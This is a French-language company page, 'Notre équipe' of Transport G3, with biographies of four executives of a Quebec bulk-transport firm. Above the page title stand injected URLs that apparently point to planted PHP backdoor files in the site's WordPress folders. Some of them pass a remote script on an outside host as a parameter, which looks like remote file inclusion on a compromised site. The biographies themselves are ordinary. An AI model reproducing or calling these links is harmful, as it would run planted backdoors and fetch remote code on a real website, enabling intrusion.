http://legroupeg3.com/f/wp-content/uploads/2014/class-wp-customize.php?limit=http://repository.bid/script/prostoparanoia/ras http://legroupeg3.com/f/wp-includes/js/module.audio.wma.php http://legroupeg3.com/f/wp-content/themes/Chameleon/ms-check.php?varname=http://repository.bid/script/prostoparanoia/ras http://legroupeg3.com/f/wp-content/plugins/lightbox-gallery/options-opml.php Notre équipe | G3 Transport

Notre équipe

Transport G3 est composé d’une équipe de direction possédant une grande expertise dans le domaine du transport ainsi qu’un important savoir-faire en gestion et en sécurité.

Pierre Groulx, Président
Après ses études au CÉGEP du Vieux-Montréal, où il a obtenu un diplôme d’études collégiales en administration des affaires (1973), Monsieur Groulx a joint les rangs de Union Carbide Canada Ltée à titre de commis au transport. Il a par, la suite, œuvré au sein de la division Private Trucking Operations(PTO) à compter de 1979  et a gravi les échelons pour en devenir le directeur. En 1995, il quitte Union Carbide Canada Ltée pour fonder Transport G3, de concert avec deux collègues. Depuis, il assume la présidence de l’entreprise et a été l’architecte de son développement.

Robert Fortier, Vice-président exécutif et Directeur général
Issu des H.E.C. où il a obtenu son B.A.A. option comptabilité en 1980, il a occupé le poste de contrôleur au sein d’entreprises œuvrant dans le domaine de l’importation et de la distribution puis, dans les services aux entreprises jusqu’en 1997. Par la suite, il est devenu directeur général d’Iron Mountain Montréal jusqu’en 2003 puis il a occupé le poste de Président directeur général d’Iron Mountain France de 2003 à 2009. De retour au Québec en 2009, il s’est joint au cabinet-conseil Stratmark Inc. jusqu’à la fin de 2012. Il a été recruté par Pierre Groulx à la fin 2012 pour assurer sa succession et participer à la croissance de Transport G3.

Marcelle Auger, Vice-présidente Technologies de l’information, Procédures opérationnelles et Qualité
Madame Auger a travaillé en transport et logistique dans la division PTO de Union Carbide Canada Ltée de 1982 à 1994, date à laquelle elle devint cofondatrice de Transport G3, où elle a par la suite occupé divers postes de direction, contribuant à l’essor de l’entreprise.

Dan Shields, Vice-président Ventes et Marketing
Détendeur d’un MBA (Université Concordia), Monsieur Shields a occupé plusieurs postes de direction en transport / logistique chez Union Carbide Canada Ltée (1972-1988) et Ryder (1988-1995) avant de ce joindre à Transport G3 en 1995. Il fut également président de l’Association Canadienne du Camionnage d’Entreprise et membre du conseil du groupe Transport pour L’Association Canadienne des Fabricants de Produits Chimiques.

En plus de son équipe de direction, la force de Transport G3 réside dans son personnel qualifié. Chaque employé met en pratique les valeurs de l’entreprise lorsqu’il contribue à rencontrer les besoins de transport en vrac spécialisé pour une clientèle industrielle localisée au Québec, en Ontario, dans les Maritimes et l’Est des États-Unis.